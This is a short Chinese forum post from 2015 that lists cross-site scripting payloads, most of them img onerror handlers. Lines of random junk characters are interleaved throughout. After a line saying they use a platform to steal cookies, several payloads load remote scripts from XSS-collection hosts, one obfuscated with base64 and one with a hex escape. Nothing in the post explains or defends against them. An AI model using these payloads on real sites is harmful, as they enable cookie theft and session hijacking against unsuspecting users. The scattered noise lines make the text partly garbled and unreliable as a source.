<img src='non-exist.jpg'onerror="alert('xss')">
% f6 |# `( L- {+ F7 f<img src=# onerror=alert(123)>% \9 [1 f& w& K- H
<img src=# onerror=alert(document.cookie)>
% L/ P* f1 K1 t! Q; S1 D* S& F下面是利用平台钓cookie的1 @, l5 B0 \; J2 W" s
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>* m* Q8 [3 d- H: O* s9 x
$ j1 {! [" r( e5 ^4 z2 a( r. g7 q
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
' V/ q6 J, ^ l- o- i# b' M( r<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
2 X v& [% a4 e! `“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
6 p& |# K% z o. W<img src=1 onerror=jQuery.getScript("//xss.re/974")>
g* j5 T& K4 \/ ]$ {/ Q$ c8 U+ A<img src="#">; A8 ?" ^9 r3 z5 s/ t4 m: w
<img src="#">( e8 F. y) o5 D9 ?. ?7 z7 a1 Z
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
1 m) M7 ]) F" ~2 l( Q* {<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
9 r: e3 O* H* e, ]% l<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>* K. M$ C5 Q* W% {& Q
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
$ a5 r" ^ l6 Z# W, ~<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>9 `0 v- T2 {, t1 j: E% n# E
<img src=x width="0" height="0"></img>
" K* ^9 b1 e/ s<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
* N7 ~% N$ M2 o/ }2 s<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>5 O0 e, G; t) g- j' D1 ]. R. ?! a9 Q
|
发表于 2015-10-18 14:33:54
收藏
支持
反对